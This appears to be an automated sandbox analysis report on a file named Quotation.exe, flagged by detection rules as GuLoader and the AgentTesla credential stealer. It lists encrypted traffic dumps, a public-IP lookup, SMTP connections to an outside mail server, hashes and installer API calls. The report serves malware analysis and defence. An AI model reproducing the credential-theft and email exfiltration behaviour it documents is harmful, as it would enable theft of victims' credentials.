2024-11-01 19:29:58 UTC	4929	IN	Data Raw: 5e 7d 44 eb 8c 24 3e b4 46 ee 32 3a 74 70 24 66 4d 83 47 24 63 53 bd 56 74 df bb 88 08 8b 95 90 f8 af 1c 31 1f f8 54 9c ba d8 6f 77 8e 93 ce 2e ef 92 19 38 fe 7f c6 99 82 8c 0e a3 24 31 94 44 b1 0c 23 ce a0 02 47 67 61 ad b0 b2 1c cf 79 49 55 76 5c 64 59 33 31 b1 76 65 7f c4 86 63 4e d7 25 a9 1b 9e 7a 30 52 b7 a2 62 0b 97 05 2c b9 64 20 ce 69 66 0e 28 a1 1b 5c d3 0f 7d 9e 11 60 12 8d ad cf 6a b1 ab e0 91 4b a5 ec 53 24 4a 52 e9 c1 48 47 7f 99 b6 23 47 e6 ee f7 a0 0d 87 2b dd 10 b6 5d c0 25 1d 42 3f bb 8d 68 b1 83 31 35 a2 6e 94 9e c0 e1 16 cb d2 df 1c d0 e9 95 fb 16 68 99 0c 3b 5e f6 e6 70 43 34 4a c9 58 67 d4 52 6f 0f af 7a fb 97 a9 8c a8 89 bf c9 cf c7 2c 91 07 7c f3 6d 37 83 e4 12 8c 17 a8 88 78 67 93 04 14 39 1f 76 34 be b9 ee 65 1d e1 c1 a8 bc 86 56 Data Ascii: ^}D$>F2:tp$fMG$cSVt1Tow.8$1D#GgayIUv\dY31vecN%z0Rb,d if(\}`jKS$JRHG#G+]%B?h15nh;^pC4JXgRoz,\|m7xg9v4eV
2024-11-01 19:29:58 UTC	4840	IN	Data Raw: ee 88 ad e3 d2 89 b1 aa ab 40 4b c6 ed 91 c8 14 b2 bc 3d da 27 e9 88 8a 5c 9e 2e 68 13 dd 87 bd 0c 4e ad e9 4d 63 75 76 78 c4 cd 16 b3 45 1b b1 61 96 db c6 92 d0 7e d0 57 a5 7f fd 88 22 e9 8a 2a 43 63 4f 2f bf 4f dd f5 4b 65 c4 20 36 78 6a a4 a8 e1 b3 35 0d 1f 8e 89 d7 d0 1e b5 93 c9 20 61 1c 9e 0f d2 72 d2 a4 2a 71 89 44 0a 57 32 9a 36 6e a9 dc 45 d5 ca 3c 31 a3 0d 63 a9 d2 ef c6 82 45 87 08 dd 65 ee 40 36 90 0d 69 33 0e 9c 70 83 88 ee 51 e0 e7 fd 9e be a4 cd 8a 9e a6 6f ce 94 00 0e 15 46 be 2b 26 a9 fc e3 37 46 f0 e2 e1 6a 26 f8 8c 4c 71 b1 95 ff 0d 24 c9 38 86 8b 38 75 e0 4f e4 07 76 34 2f 09 20 27 d9 c6 d6 ca ca 47 b2 c4 30 a2 11 58 86 a2 7a d8 64 e2 fe 00 a9 d3 45 63 17 97 e0 3d a1 7c 23 0d 36 b9 7c 17 bb 9f 70 bc e8 6e 68 2b 42 8f b1 ff de 07 6d b3 Data Ascii: @K='\.hNMcuvxEa~W"CcO/OKe 6xj5 arqDW26nE<1cEe@6i3pQoF+&7Fj&Lq$88uOv4/ 'G0XzdEc=\|#6\|pnh+Bm
2024-11-01 19:29:58 UTC	1378	IN	Data Raw: b5 b1 6a b4 31 11 13 45 25 a7 9a 2a 5a 0b ca 87 a3 a0 8b 4b 63 06 77 df f0 d0 42 20 25 69 18 a2 17 50 d0 a2 98 6e ee ae 4e ff 7b b7 03 ff 12 07 e2 9c 3f 59 59 a6 88 f1 df 9c a1 ca 8f 2f 1c 04 74 dd 76 4e d5 c4 3a e5 1f af b5 c2 7c 8f 64 5c df 63 63 d6 56 9a 88 ff c8 b9 72 1c 2d 56 58 b5 02 ed d0 78 73 fb 89 80 92 61 c3 50 1a 65 4c ba e0 dd 27 f0 84 5a 34 97 e3 ac 76 1a db 2a fb fb c4 e5 95 f4 07 06 df 33 4a 67 b9 ba 53 23 15 69 83 7b 61 a2 bb d2 58 b5 94 bb 9b fd 65 48 4b 74 c3 7b ec 97 39 9c 43 29 b4 28 bc 82 ae 38 cc 4c 3e f3 fd 49 7b f1 8a 03 bb cc fc a8 bf cb a3 2a 06 67 65 a7 4e bc e3 30 59 43 ed 76 5c 9a 57 3f 31 b1 c8 69 73 c4 a6 60 4e d7 25 57 1a a7 60 30 52 b7 5c 6e 09 97 fb 20 b8 64 4f 8c 69 66 04 d6 af 18 5c f3 0b 7d 1e 11 9e 1c 8f b2 75 9a bd Data Ascii: j1E%ZKcwB %iPnN{?YY/tvN:\|d\ccVr-VXxsaPeL'Z4v3JgS#i{aXeHKt{9C)(8L>I{*geN0YCv\W?1is`N%W`0R\n dOif\}u
2024-11-01 19:29:58 UTC	1378	IN	Data Raw: 47 7b f2 1b 47 73 0d b3 a5 2a 35 9d 8b 78 2f 4d 7e c0 c9 db d2 c5 58 22 b0 92 6d fb f5 ee bf b6 5b 96 56 b5 b1 67 81 34 31 0a 45 1d a2 64 2b 63 3d 3c 79 5c 67 62 49 63 06 44 f5 f3 d0 5b df 2b 65 10 a2 e9 4d fc a2 b8 7c ee 50 40 02 7a b6 1d fe 12 07 1c 6e 37 5a 71 b8 8d f1 d5 10 1b cb b6 38 e2 0a 74 23 5a 5d d5 3a 36 1a 11 e3 af c2 82 83 48 5a ff 67 63 28 58 67 89 c6 14 b5 71 1c f3 5e 58 b5 2a 2c d1 41 68 db 99 80 6c 6d a9 08 cc 2b 4d ba ca 20 29 f4 84 84 3f 94 e3 ac 76 18 d4 2a db 01 c8 e9 95 2a 12 3f fc 33 b4 66 7e a8 53 23 69 f4 8f 7f 65 74 89 d0 58 41 14 fe 9b d5 66 b6 45 5f 3d 55 f9 97 19 99 bd 27 b8 d6 b2 7f a2 34 32 60 34 f3 dd 48 85 f0 b3 eb ba f5 ea 56 b3 ce 5d 0b 47 67 1e ce b0 b2 e7 ce 77 49 ed 56 5e 64 59 33 cf bf 35 65 7f 3a 8a 60 4e f7 26 a9 Data Ascii: G{Gs5x/M~X"m[Vg41Ed+c=<y\gbIcD[+eM\|P@zn7Zq8t#Z]:6HZgc(Xgq^X,Ahlm+M )?v**?3f~S#ietXAfE_=U'42`4HV]GgwIV^dY35e:`N&
2024-11-01 19:29:58 UTC	1378	IN	Data Raw: 42 d5 e8 e0 44 30 53 64 36 10 4e 75 29 05 80 24 2e 92 7f e4 ae 79 bd bd b6 06 70 20 88 bf 0c 73 bf bf c8 b9 77 0f 17 64 73 2d b8 a5 d4 34 5a 80 41 0f 4d 7e e0 36 d2 d2 c5 dd 48 b3 92 69 fb f4 ec bf ed 3a 96 56 b1 20 5d b8 31 37 2a 49 25 a7 64 d5 6d 06 ca 87 5d 94 4b 49 43 06 57 c5 f0 2e 43 e7 21 65 18 a2 e9 7c dd a2 b8 7c 10 a0 4d 01 7a 70 14 fc 12 27 10 90 3b 59 8f 99 b1 f4 d5 10 e5 f2 8a 2e e2 0a 4c 03 ab a2 2a ba 76 1b 11 a9 4b cb 83 83 96 55 fd 67 9d df 55 64 a1 f5 ea b9 74 36 d3 47 68 b0 2a c2 d1 78 79 d0 99 80 83 41 a9 08 32 25 b2 b4 e9 23 11 87 84 7a 31 97 1d a0 8b 14 f7 28 fb 05 c8 17 94 ed 1d 06 df 33 8c bb 80 a1 53 03 16 97 8f 7f 9f 84 86 d2 58 41 14 fc 9b dd 65 b6 45 74 3d 5a c0 85 39 9c bd 07 b8 28 bc 7c 5c 3a cc 6c 17 f1 fd 49 85 0e bd 16 bb Data Ascii: BD0Sd6Nu)$.yp swds-4ZAM~6Hi:V ]17I%dm]KICW.C!e\|\|Mzp';Y.LvKUgUdt6Gh*xyA2%#z1(3SXAeEt=Z9(\|\:lI
2024-11-01 19:29:58 UTC	1378	IN	Data Raw: c0 a6 ae 96 17 d4 93 9a b1 24 89 de 8a c9 ef 20 41 8d de e9 81 bb d3 b0 a0 ff 94 97 0c 20 46 4f 5e 07 6b 42 2b 18 e2 7d 2c ad 68 35 ee 67 7d 29 7e f4 da 2f af 59 b8 ae 79 8f f7 1b 06 70 00 a1 bd 0c 73 41 4f c5 bb 77 f1 e5 6b 71 0d 93 a7 d4 34 a4 7f 79 16 5f 7e e0 c8 fb d2 c5 a6 2c 4d 9c 6d 05 d9 ee bf 96 5d 68 58 b7 4f 66 46 3d 33 0a 65 25 a7 64 2b 9d 04 f3 8d a3 98 48 49 43 07 57 c5 f0 2e 4c dc 2b 65 e6 ae eb 5c fc a1 b8 7c ee 50 4f 38 7f 8e 18 ff 2a 02 1c 90 3b 61 0b 67 77 0e 2b 19 e5 ca f4 5b e2 0a 70 f8 a8 53 d4 c4 c4 16 11 a3 9d 9f 82 83 62 a2 f6 67 63 ad 22 64 89 c2 c2 bf 72 1c d5 a2 51 b5 2a a0 eb 7a 79 ab e4 f4 92 61 ad d5 21 25 4c ba 14 2f 29 f4 bd 73 31 97 e3 52 84 15 d7 02 a5 05 c8 e3 49 fe 12 16 df 33 b6 66 14 a1 6b ef 15 84 8f 7f 61 8a 96 e2 Data Ascii: $ A FO^kB+},h5g})~/YypsAOwkq4y_~,Mm]hXOfF=3e%d+HICW.L+e\\|PO8;agw+[pSbgc"drQzya!%L/)s1RI3fka
2024-11-01 19:29:58 UTC	1378	IN	Data Raw: a5 78 32 16 a3 78 a4 87 2b 9e d3 cc ac f1 fb 63 c4 c9 4d a6 70 29 c7 da 6c bf d5 b5 ce 93 86 5f 8e d2 56 c0 43 9f ad 34 34 93 9a 4f 21 89 de b3 ac ef 20 47 73 29 e6 83 9b 98 31 a0 ff 6a 96 ad 15 49 4d 7e 06 4b 48 2b e6 e3 ba 3e ad 68 35 ee 62 7d 29 25 97 da 2f ab 8f e5 97 73 85 cd b6 2c 50 18 81 bf 0c 8d 4f b1 cb b9 89 fd 1b 67 53 47 b3 a5 d4 ca a5 b8 72 2f 4d 7e ca e8 90 d2 c5 a6 d2 bd 92 6d 05 07 e1 bf 96 7d f7 56 b5 4f 98 b9 08 13 0a 45 25 59 6d 2b 63 20 b1 f3 a3 98 4c 3b ef 02 57 b5 d8 cb 42 de 21 18 6c a2 e9 58 fc c0 b8 7c ee 50 40 01 7a 8e e6 f3 12 07 3c a2 3b 59 71 66 89 c8 df 10 e5 ca a5 0e d1 0a 74 dd a8 53 d5 c4 3a e5 1d a3 b5 e2 c5 83 68 5c 01 66 5a dc 56 64 89 ec ca f1 72 1c d3 a2 56 b5 2a d2 2e 74 79 db b9 ce 92 61 a9 f6 33 1c 5b ba ea 23 d7 Data Ascii: x2x+cMp)l_VC44O! Gs)1jIM~KH+>h5b})%/s,POgSGr/M~m}VOE%Ym+c L;WB!lX\|P@z<;YqftS:h\fZVdrV*.tya3[#
2024-11-01 19:29:58 UTC	1378	IN	Data Raw: 8d a9 ed 5d 46 2f 11 88 f1 05 13 fb 59 ed 70 26 88 68 bc a0 e7 01 cd 8c 6b e2 b6 92 58 bc ba fe ef a5 17 58 79 cc 0f 8c 78 a4 87 2b 99 d3 cc 84 42 f7 63 c2 c9 46 a6 70 29 c7 d5 55 b5 d5 4b c2 b9 a6 76 87 d2 56 3e b3 9e 94 17 ca 9f 9a b1 08 b0 de 9b e9 11 21 78 9a 20 e7 83 45 e2 30 a0 df 99 97 f2 2c 04 e0 81 f9 94 62 11 e6 e3 44 ce a3 68 35 10 90 71 29 05 a0 ff 2f ab 71 1a af 40 a7 cd b6 06 8e 09 81 bf 29 08 35 b1 cb bd 05 2f 1f 67 03 25 a8 a5 d4 3e d9 f5 78 2f 49 5e c6 c8 db d2 3b a8 2c b3 92 93 09 f9 ed 9f bd 5d 96 56 4b 4e 5f 9a 31 31 0a bb 2c a7 64 0e 18 71 ca 87 a7 ea a2 4d 63 76 7f de f0 d0 48 a3 5f 65 18 a6 c9 70 dc a2 b8 82 e0 ae 4e 01 84 82 18 ff 32 4e 1c 90 3b a7 70 a1 aa f1 d5 10 1b c3 8f 2e c7 71 00 dd 56 59 a7 3c 3e 1b 61 8b ae c2 82 89 15 28 Data Ascii: ]F/Yp&hkXXyx+BcFp)UKvV>!x E0,bDh5q)/q@)5/g%>x/I^;,]VKN_11,dqMcvH_epN2N;p.qVY<>a(
2024-11-01 19:29:58 UTC	1378	IN	Data Raw: 31 86 92 86 bd b1 32 ba 7f 8c 3c 7e e4 b9 2b 87 25 52 7a 7b 3d 69 d1 93 8f 0a 5c f9 11 66 8e 2d 8a c6 0a 8d ad cd f0 48 2f 11 76 01 09 13 fb 87 dd 70 26 a8 9c bd 99 f0 ff cc b5 b7 eb b7 92 86 c5 ba fe ca 9e 08 a5 86 37 5d 25 7d a4 f7 fd 8c d3 cc 8e c1 8f 63 c2 ed 6e ad 70 29 39 2a 62 bf d5 4b 3c 9f 86 7f a7 df 56 c0 bd 60 95 2e 16 93 9a b1 d6 80 de 9b cc 94 54 41 8d 24 95 25 be eb 41 88 e4 94 97 f8 51 30 4f 7e 02 4b 4c 2b e6 e3 ba 3e ad 68 35 ee 62 7d 29 25 83 da 2f ab 8f e5 97 6e 85 cd b6 f8 79 01 81 9f 04 73 41 b1 8b 75 80 0e e4 47 77 0d b3 a5 2a 3a a4 81 78 d1 41 7e e0 e8 93 d2 c5 a6 d2 b2 ab 7a 05 f9 ed 41 9f 5c 96 76 c1 4f 66 b8 71 d3 08 45 25 87 2d 2b 63 05 34 89 a3 98 48 b7 6f 06 57 e5 aa d0 42 de d5 64 21 b5 e9 5c dc 5c b1 7d ee 8e 34 01 7a 8e 58 Data Ascii: 12<~+%Rz{=i\f-H/vp&7]%}cnp)9bK<V`.TA$%AQ0O~KL+>h5b})%/nysAuGw:xA~zA\vOfqE%-+c4HoWBd!\\}4zX
2024-11-01 19:29:58 UTC	1378	IN	Data Raw: 85 94 19 03 72 52 9a 66 b6 65 76 cd 78 27 9c 04 c0 28 b8 4e bf 54 b3 b2 c3 0b 2c 59 cc d6 bb 36 5d 18 3b e0 2b 6d a6 ef 4f 33 83 a3 82 3c 7e 1a 4e 27 87 00 09 3a 7b 3d 6d 5d 18 b3 28 2c d1 0a 98 87 27 f7 97 71 f9 a9 ed a7 3a 1d 17 88 7f 21 08 fb 79 db 0d 52 88 96 b9 b9 c5 01 cd 8c 6b e5 b7 92 78 32 b6 fe ef c5 25 a5 86 33 d1 b0 41 ae 87 d5 97 f9 ec de bc fb 63 3c e7 4e a6 70 d7 35 d4 6c 9f f6 4b c2 93 78 7e be d8 56 c0 bd b4 b4 33 34 93 9a 4f 26 89 de 9b 17 e3 20 41 ad 38 e7 83 bb 15 30 99 e8 94 97 f2 d2 4d 4e 7e 26 4d 42 2b e6 a3 73 c7 52 97 15 09 6e 7d 29 fb 8e da 2f ab 8f e8 ae 79 a5 bc b6 06 70 fe 80 86 23 73 41 b1 35 b0 77 f1 3e 1c 07 0d b3 a1 2a 3d a4 81 86 26 4c 7e c8 87 db d2 c3 c9 4e b3 92 67 2d e2 ed bf 9c 20 e2 56 b5 4b 46 ca 31 31 0a bb 2b a7 Data Ascii: rRfevx'(NT,Y6];+mO3<~N':{=m](,'q:!yRkx2%3Ac<Np5lKx~V34O& A80MN~&MB+sRn})/yp#sA5w>*=&L~Ng- VKF11+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49827	104.26.13.205	443	8048	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:30:00 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-01 19:30:00 UTC	399	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 19:30:00 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8dbe4c002a0d4756-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2620814&cwnd=248&unsent_bytes=0&cid=88321ba96de8160f&ts=211&x=0"
2024-11-01 19:30:00 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 Data Ascii: 173.254.250.82

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 1, 2024 20:30:03.735570908 CET	587	49845	67.23.226.139	192.168.2.4	220-super.nseasy.com ESMTP Exim 4.96.2 #2 Fri, 01 Nov 2024 15:30:03 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 1, 2024 20:30:03.735874891 CET	49845	587	192.168.2.4	67.23.226.139	EHLO 648351
Nov 1, 2024 20:30:03.888665915 CET	587	49845	67.23.226.139	192.168.2.4	250-super.nseasy.com Hello 648351 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 1, 2024 20:30:03.888906002 CET	49845	587	192.168.2.4	67.23.226.139	STARTTLS
Nov 1, 2024 20:30:04.044675112 CET	587	49845	67.23.226.139	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	15:28:42
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation.exe"
Imagebase:	0x400000
File size:	1'183'256 bytes
MD5 hash:	EAAD92690F4CC140B25AFFB391767C48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2183844023.000000000953E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:29:32
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation.exe"
Imagebase:	0x400000
File size:	1'183'256 bytes
MD5 hash:	EAAD92690F4CC140B25AFFB391767C48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2951221358.0000000038161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2951221358.0000000038161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2951221358.000000003818C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2951221358.0000000038194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	30.1%
Dynamic/Decrypted Code Coverage:	26%
Signature Coverage:	16.4%
Total number of Nodes:	827
Total number of Limit Nodes:	18

Executed Functions

Function 004036DA Relevance: 80.9, APIs: 32, Strings: 14, Instructions: 416
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F
GetVersionExW.KERNEL32(?), ref: 00403732
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
OleInitialize.OLE32(00000000), ref: 0040381B
SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
CharNextW.USER32(00000000,007B3000,?,007B3000,00000000), ref: 0040389B
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
DeleteFileW.KERNELBASE(1033), ref: 00403A05

Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403AA8
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403ABB
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403ACA
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403AD9
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,0079F200,00000001), ref: 00403B66
CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F

Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00405E04
Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E

OleUninitialize.OLE32(00000000), ref: 00403BCD
ExitProcess.KERNEL32 ref: 00403BE4
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E

Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,007B3000,?,007B3000,00000000), ref: 004065EA

Strings

\Temp, xrefs: 004039B0
UXTHEME, xrefs: 004037CE, 004037D3, 004037D9
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6
TMP, xrefs: 004039E6
C:\Users\user\Desktop\Quotation.exe, xrefs: 00403B61
Low, xrefs: 004039CC
~nsu, xrefs: 00403A9C
C:\Users\user\AppData\Local\Temp\, xrefs: 0040398E, 00403993, 004039A9, 004039B5, 004039C4, 004039D1, 004039DD, 004039E5, 00403AA1, 00403AB6, 00403AC5, 00403AD4, 00403AE7, 00403AFC, 00403BB4
.tmp, xrefs: 00403AC0
NSIS Error, xrefs: 00403840
1033, xrefs: 00403A00
TEMP, xrefs: 004039DE
SeShutdownPrivilege, xrefs: 00403C10
Error launching installer, xrefs: 00403A4D

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 1152188737-1028372413
Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,74DF3420,?), ref: 0040666A
Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

DeleteFileW.KERNELBASE(?,?,00000000,74DF3420,?), ref: 00406723
lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,74DF3420,?), ref: 00406775
lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,74DF3420,?), ref: 00406796
lstrlenW.KERNEL32(?), ref: 00406799
FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
FindClose.KERNEL32(00000000), ref: 00406853

Strings

\*.*, xrefs: 0040676B

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF

Function 004065AD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
